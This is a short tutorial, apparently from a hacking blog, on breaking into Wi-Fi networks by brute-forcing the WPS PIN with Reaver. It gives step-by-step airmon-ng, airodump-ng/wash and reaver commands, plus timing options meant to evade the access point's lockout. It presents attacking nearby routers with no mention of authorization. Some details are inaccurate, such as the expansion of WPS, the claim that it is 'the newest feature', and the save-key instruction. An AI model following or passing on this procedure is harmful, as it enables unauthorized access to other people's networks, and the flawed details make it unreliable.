In this tutorial i’m going to show you yet another way of cracking wifi networks. Today we are going to exploit a loophole in the newest feature of modern day routers, which is WPS (Wireless Protected Setup).This will work only if WPS is enabled on the router, which generally is.
What You’ll Need :-
- Preferably a PC with kali linux or Backtrack installed.
To crack WPS network we are going to use an awesome tool, REAVER-WPS created by Reaver-Systems
Don’t Miss :-
Cracking WPA/WPA-2 Networks
OR
Cracking WiFi (W.E.P Networks)
Steps To Follow :-
Open up a terminal window and put you wireless card into Monitor mode by typing:
- airmon-ng start wlan0
Next, we will need the MAC Address of the router we are going to attack. Get this by typing:
- airodump-ng mon0 or wash -i mon0
Now the list of routers available in the vicinity should appear, copy the address of targeted network.
Next, we start up reaver.
- reaver -i mon0 -b MACADDRESSHERE -vv
Some Access Points tend to lock their W.P.S. state if they detect any suspicious activity for 5 minutes or so, in that case reaver will not carry on bruteforcing until the A.P. comes out of the locked state. The default period of reaver to check for the unlocked state is 315 seconds or 5 min 15 seconds. This can be increased or decreased using the ‘lock-delay’ option while launching reaver like this :
- reaver -i mon0 -b MACADDRESSHERE -vv –lock-delay=300
You can also alter the time between pin attempts to fool the A.P. of any suspicious activity (default is 1 second) but it can increase the total bruteforcing time. If you need to use this delay feature use this command :
- reaver -i mon0 -b MACADDRESSHERE -vv -d 5
Now just sit back and let the program do it’s work. It can take as long as 24+ hours for a weak signal. But usually less than 12 hours.
If you need to use your PC in the mean time, just save your work by pressing:
- CTRL + ALT + C
And restart it from the same point just by following step 3 of the process.
Enjoy..!!
Enjoy..!!